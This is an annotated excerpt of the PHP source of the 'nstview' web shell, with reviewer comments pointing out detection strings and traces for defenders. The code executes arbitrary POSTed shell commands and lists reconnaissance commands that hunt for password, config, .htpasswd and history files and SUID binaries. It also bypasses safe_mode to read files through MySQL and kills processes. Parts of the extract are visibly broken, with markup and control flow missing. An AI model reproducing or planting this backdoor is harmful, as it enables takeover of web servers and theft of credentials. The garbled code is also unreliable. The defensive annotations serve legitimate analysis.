# Request bootstrap. Every call is prefixed with @, which suppresses any
# warning or notice the call itself would emit.
@session_start();
# A limit of 0 removes PHP's per-request execution time limit.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
# Level 0 switches PHP error reporting off for the rest of the request.
@error_reporting(0);
#####cfg#####
# use password true / false #
# When true, the $_SESSION['nst'] check further down gates the page on $password.
$create_password = true;
# NOTE(review): plaintext shared secret hard-coded in the file and shipped as a
# default. For defenders, this literal together with the suppressed errors and
# the removed time limit above is a usable static string set when scanning a
# web root for this script.
$password = "enslaved"; // default password for nstview, you can change it.
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
# One entry per line in the form "<label> (nst) <shell command>". fastcmd()
# splits this string on newlines; how each entry is rendered is not visible in
# this extract.
# NOTE(review): the entries enumerate the host: listening ports, login
# history, config/password/history files, SUID/SGID and world-writable paths,
# and which download tools are installed. The fixed " (nst) " separator and
# this list are stable strings for static detection, and the same find/locate
# patterns run by the web server account are worth alerting on in process
# telemetry.
$fast_commands = "
Show open ports (nst) netstat -an | grep LISTEN | grep tcp
last root (nst) last root
last (all users) (nst) last all
Find all config.php in / (nst) find / -type f -name config.php
Find all config.php in . (nst) find . -type f -name config.php
Find all admin.php in / (nst) find / -type f -name admin.php
Find all admin.php in . (nst) find . -type f -name admin.php
Find all config.inc.php in / (nst) find / -type f -name config.inc.php
Find all config.inc.php in . (nst) find . -type f -name config.inc.php
Find all config.inc in / (nst) find / -type f -name config.inc
Find all config.inc in . (nst) find . -type f -name config.inc
Find all config.dat in / (nst) find / -type f -name config.dat
Find all config.dat in . (nst) find . -type f -name config.dat
Find all config* in / (nst) find / -type f -name config*
Find all config* in . (nst) find . -type f -name config*
Find all pass* in / (nst) find / -type f -name pass*
Find all pass* in . (nst) find . -type f -name pass*
Find all .bash_history in / (nst) find / -type f -name .bash_history
Find all .bash_history in . (nst) find . -type f -name .bash_history
Find all .htpasswd in / (nst) find / -type f -name .htpasswd
Find all .htpasswd in . (nst) find . -type f -name .htpasswd
Find all writable dirs/files in / (nst) find / -perm -2 -ls
Find all writable dirs/files in . (nst) find . -perm -2 -ls
Find all suid files in / (nst) find / -type f -perm -04000 -ls
Find all suid files in . (nst) find . -type f -perm -04000 -ls
Find all sgid files in / (nst) find / -type f -perm -02000 -ls
Find all sgid files in . (nst) find . -type f -perm -02000 -ls
Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
OS Version? (nst) sysctl -a | grep version
Kernel version? (nst) cat /proc/version
cat syslog.conf (nst) cat /etc/syslog.conf
Cat - Message of the day (nst) cat /etc/motd
Cat hosts (nst) cat /etc/hosts
Distrib name (nst) cat /etc/issue.net
Distrib name (2) (nst) cat /etc/*-realise
Display all process - wide output (nst) ps auxw
Display all your process (nst) ps ux
Interfaces (nst) ifconfig
CPU? (nst) cat /proc/cpuinfo
RAM (nst) free -m
HDD space (nst) df -h
List of Attributes (nst) lsattr -a
Mount options (nst) cat /etc/fstab
Is cURL installed? (nst) which curl
Is wGET installed? (nst) which wget
Is lynx installed? (nst) which lynx
Is links installed? (nst) which links
Is fetch installed? (nst) which fetch
Is GET installed? (nst) which GET
Is perl installed? (nst) which perl
Where is apache (nst) whereis apache
Where is perl (nst) whereis perl
locate proftpd.conf (nst) locate proftpd.conf
locate httpd.conf (nst) locate httpd.conf
locate my.conf (nst) locate my.conf
locate psybnc.conf (nst) locate psybnc.conf
";
# WINDOWS COMMANDS
# description (nst) command
# example: Delete autoexec.bat (nst) del c:\autoexec.bat
# Same "<label> (nst) <command>" format as the Unix list; read by the Windows
# variant of fastcmd().
$fast_commands_win = "
OS Version (nst) ver
Tasklist (nst) tasklist
Attributes in . (nst) attrib
Show open ports (nst) netstat -an
";
######ver####
# Version label; it is written into the header of the table dump file.
$ver= "v2.0";
#############
# Password gate, step 1: a POSTed 'pass' that matches $password is stored in
# the session under the key 'nst'.
# NOTE(review): the comparison is a loose == against a plaintext secret, and
# the password itself (not a derived token) is what is written to the session.
# No attempt counter or lockout is visible in this extract.
$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}
# Client address: taken from the Client-IP header, then X-Forwarded-For, and
# only otherwise from REMOTE_ADDR (the last two branches read the same value).
# NOTE(review): the first two values are request headers set by the client, so
# $ip cannot be relied on as the real source address; when investigating, use
# the web server's own access log rather than anything this script records.
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
# HTML-escapes the value; where $ip is used afterwards is not visible here.
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
";
print "";
mysql_query($up_string) or die("".mysql_error()."");
}#end of make update
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\";
";
print "";
}#end of insert
}#end of update
}
# end of edit row
# insert new line
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error()."");
print "";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\";
";
print "";
}#end of mk ins
}#end of ins new line
# Rename-table handler: runs when ?rename_table is present and issues the
# RENAME TABLE statement once new_name has been POSTed. The form markup that
# originally sat in the print strings is missing from this extract.
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
# NOTE(review): the query-string value is echoed into the page unescaped.
print "
Rename $rename_table to
";
if(isset($_POST['new_name'])){
# $db is not assigned in the visible lines - presumably set earlier from the
# request; verify against the full file.
mysql_select_db($db) or die("".mysql_error()."");
# NOTE(review): both identifiers are taken straight from the request and
# concatenated into the statement with no quoting or allow-list, and the raw
# driver error is returned to the client on failure. The mysql_* functions used
# here were removed in PHP 7.0, so this path only runs on older runtimes.
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error()."");
print " Table $rename_table renamed to ".$_POST['new_name']."";
print "";
}
}#end of rename
# dump table
# Writes a SQL dump of one table (DROP TABLE, the CREATE statement, then one
# INSERT per row) to the file $f inside directory $f_d.
# $f_d, $f, $db and $tbl are not assigned in the visible lines; the error text
# below says f_d can be supplied in the URL, so treat all four as
# request-controlled until the full file shows otherwise.
if($_GET['dump']){
if(!is_writable($f_d)){die("
This folder $f_d isnt writable! Cannot make dump.
You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter
");}
mysql_select_db($db) or die("".mysql_error()."");
# NOTE(review): the target path is plain concatenation with no validation, and
# the fopen() result is not checked before the writes that follow.
$fp = fopen($f_d."/".$f,"w");
# Header block of the dump file. For incident response: a file on disk that
# starts with "# nsTView.php v" is an artifact of this feature having been
# used, and it records the server name/address and the dump time.
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db ) Table ( $tbl )
# --- eof ---
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error()."");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
# Column 1 of SHOW CREATE TABLE is the CREATE statement; normalise its line
# endings to CRLF before writing it out.
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
# Unlike the query above, this SELECT has no "or die"; its result is passed
# to mysql_num_rows() unchecked.
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
# adds2() is defined outside this extract - presumably an escaping helper;
# confirm before relying on the dump being well-formed SQL.
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print "";
}#end of dump
# db dump
# Runs when ?dump_db is set. Only the table count and the fallback branch
# survive in this extract; the markup and per-table logic that originally sat
# in the print strings are missing.
if($_GET['dump_db']){
# Number of tables in $db ($db is not assigned in the visible lines).
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print "
";
}else{$hmm="DELETED";}
print "";
}
# fastcmd() is declared conditionally: one definition per value of $os, each
# reading the matching command list. $os is not assigned in the visible lines.
# The output that originally followed (inside the print strings) is missing
# from this extract, so only the entry counting is documented.
if($os=="unix"){
function fastcmd(){
global $fast_commands;
$c_f=explode("\n",$fast_commands);
# The list string starts and ends with a newline, so explode() yields an empty
# first and last element; subtracting 2 leaves the number of real entries.
$c_f=count($c_f)-2;
print "
";
}
}#end of os unix
if($os=="win"){
function fastcmd(){
global $fast_commands_win;
$c_f=explode("\n",$fast_commands_win);
# Same adjustment as the Unix variant: drop the two empty edge elements.
$c_f=count($c_f)-2;
print "
";
}
}#end of os win
echo "
";
# Command console, variant selected by ?shell=1. Changes into $d, prints the
# working directory and the quick-command list, then runs whatever was POSTed
# in 'sh'. $d is not assigned in the visible lines.
if(@$_GET['shell']=="1"){echo "
cmd pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
# On Windows every "/" in $d is replaced by two backslashes.
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
if(@$_POST['sh']){
$sh=$_POST['sh'];
echo "
";
# NOTE(review): the backtick operator hands the unmodified POST value to the
# system shell and the output is printed without escaping. For detection:
# POST requests to a PHP file carrying an 'sh' field with shell=1 in the query
# string, and the web server account spawning shell child processes, are the
# observable traces of this path.
print `$sh`; echo "
";}
}
# Command console, variant selected by ?shell=2. Same flow as the shell=1
# branch, but it prints $copyr and ends the request when done. $d and $copyr
# are not assigned in the visible lines.
if(@$_GET['shell']=="2"){
echo "
cmd
pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
# On Windows every "/" in $d is replaced by two backslashes.
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
# NOTE(review): the POSTed 'sh' value is executed as-is through the backtick
# operator below and its output is printed unescaped. The web server account
# spawning a shell in response to a POST is the behaviour to alert on.
if(@$_POST['sh']){
$sh=$_POST['sh'];
echo "
"; print `$sh`; echo "
";}
echo $copyr;
exit;}
# Runs when ?delfl is set. In this extract the delete-folder prompt and a
# create-directory step share one block; markup and probably code between them
# appear to have been lost, so the real control flow should be checked against
# the full file.
if(@$_GET['delfl']){
@$delfolder=$_GET['delfolder'];
# NOTE(review): the query-string value is echoed into the page unescaped.
echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable) Yes || No
";
if($_POST['dir_n']){
# NOTE(review): the new directory path is $d plus the raw POST value, with no
# check that the result stays under $d.
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "Directory created success!";
}
print $copyr;
die;
}
# Create-file handler: when ?mkfile is set and 'file_n' is POSTed, an empty
# file of that name is created under $d. $d and $copyr are not assigned in the
# visible lines.
$mkfile=$_GET['mkfile'];
if($mkfile){
print " Create file in $d :
";
if($_POST['file_n']){
# NOTE(review): mode "w" creates the file or truncates an existing one, and
# the path is $d plus the raw POST value with no containment check. The handle
# is not closed in the visible lines. For defenders, new zero-byte files
# written by the web server account are the trace this leaves.
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "File created success!";
}
print $copyr;
die;
}
# Process table view: optionally kills a PID, then lists processes from the
# output of ps aux. The loop that renders the rows is damaged in this extract
# (its header and markup are partly missing), so only the visible statements
# are documented.
$ps_table=$_GET['ps_table'];
if($ps_table){
if($_POST['kill_p']){
# NOTE(review): the POST value is appended to the command line unvalidated, so
# it is not restricted to a numeric PID.
exec("kill -9 ".$_POST['kill_p']);
}
$str=`ps aux`;
# Captures a 1-7 digit number (used below as the PID) and the text after a
# d:dd time field (used below as the command) from the ps output.
preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
print " PS Table :: Fast kill program
";
print "
";
for($i=0; $i
$expl[0]
PID: ".$matches[1][$i]." :: ".$matches[3][$i]."
";
}#end of for
print "
";
unset($str);
print $copyr;
die;
}#end of ps table
$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "
Read file content using MySQL - when safe_mode, open_basedir is ON
";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error()."");
mysql_create_db("tmp_bd_file") or die("".mysql_error()."");
mysql_select_db("tmp_bd_file") or die("".mysql_error()."");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error()."");
mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("".mysql_error()."");
print "File content: